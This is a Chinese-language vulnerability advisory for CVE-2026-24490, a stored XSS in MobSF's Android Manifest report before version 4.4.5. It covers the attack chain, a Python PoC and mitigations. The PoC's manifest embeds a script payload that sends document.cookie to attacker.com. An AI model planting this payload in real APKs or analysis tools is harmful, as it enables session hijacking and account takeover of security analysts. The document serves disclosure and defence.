IPBUF安全漏洞报告
English
CVE-2026-24490 CVSS 8.1 高危

CVE-2026-24490 MobSF Android Manifest分析存储型XSS漏洞

披露日期: 2026-01-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-24490
漏洞类型
存储型XSS
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
需要交互 (UI:R)
影响产品
MobSF (Mobile-Security-Framework-MobSF)

相关标签

存储型XSSMobSFAndroid安全测试会话劫持CVE-2026-24490移动应用安全HTML注入

漏洞概述

MobSF是一款流行的移动应用安全测试框架,广泛用于Android APK和iOS IPA的安全分析。在4.4.5版本之前,MobSF的Android Manifest分析功能存在一处存储型跨站脚本(Stored XSS)漏洞。攻击者可构造包含恶意JavaScript代码的APK文件,通过上传功能提交到MobSF进行分析。当分析人员查看生成的HTML报告时,嵌入在AndroidManifest.xml中特定intent-filter配置里的恶意代码将被执行。由于MobSF通常在团队内部部署使用,攻击成功可导致分析人员的会话被劫持,甚至造成账户接管。由于需要高权限用户操作,该漏洞的实际利用需要一定的访问权限,但一旦成功影响严重。

技术细节

漏洞根源于MobSF解析AndroidManifest.xml文件时,对<data>标签的android:host属性值缺乏输入验证和输出编码。当分析包含类似<intent-filter><data android:scheme="android_secret_code" android:host="<script>alert(document.cookie)</script>"/></intent-filter>配置的应用时,攻击者注入的JavaScript代码会被直接写入HTML报告页面而未经任何转义处理。由于该数据被持久化存储在分析报告中(而非反射型XSS的一次性触发),所有后续访问该报告的用户都会触发恶意代码执行。攻击者可利用此漏洞窃取用户Cookie/Session信息、执行任意操作或进一步横向移动。修复方案在4.4.5版本中通过添加HTML实体转义函数对所有Manifest属性值进行安全处理。

攻击链分析

STEP 1
步骤1
攻击者创建包含恶意payload的AndroidManifest.xml文件,在<intent-filter>的<data>标签中嵌入XSS脚本
STEP 2
步骤2
将修改后的Manifest打包进APK文件,通过MobSF的上传接口提交分析
STEP 3
步骤3
MobSF解析APK并将android:host属性值未经过滤地写入HTML报告
STEP 4
步骤4
分析人员或管理员查看HTML报告时,恶意JavaScript在其浏览器上下文中执行
STEP 5
步骤5
攻击者通过XSS窃取受害者Cookie/Session,实现会话劫持或账户接管

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # CVE-2026-24490 PoC - Malicious APK Manifest Fragment # This demonstrates the XSS payload in android:host attribute android_manifest_xml = '''<?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.maliciousapp"> <application android:allowBackup="true" android:label="Malicious App" android:supportsRtl="true" android:theme="@android:style/Theme.Material.Light"> <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> <!-- XSS payload in android:host attribute --> <intent-filter> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <data android:scheme="android_secret_code" android:host="<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" /> </intent-filter> </activity> </application> </manifest>''' print("PoC: Craft APK with malicious AndroidManifest.xml containing XSS payload") print("Payload location: <data android:scheme='android_secret_code' android:host='...XSS...'/>") print("Upload to MobSF < v4.4.5, view HTML report to trigger XSS")

影响范围

MobSF < 4.4.5

防御指南

临时缓解措施
如无法立即升级,可在MobSF前端部署WAF规则过滤请求中的<script>标签;限制MobSF上传功能的访问权限;分析来源不明的APK时使用独立浏览器或禁用JavaScript。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表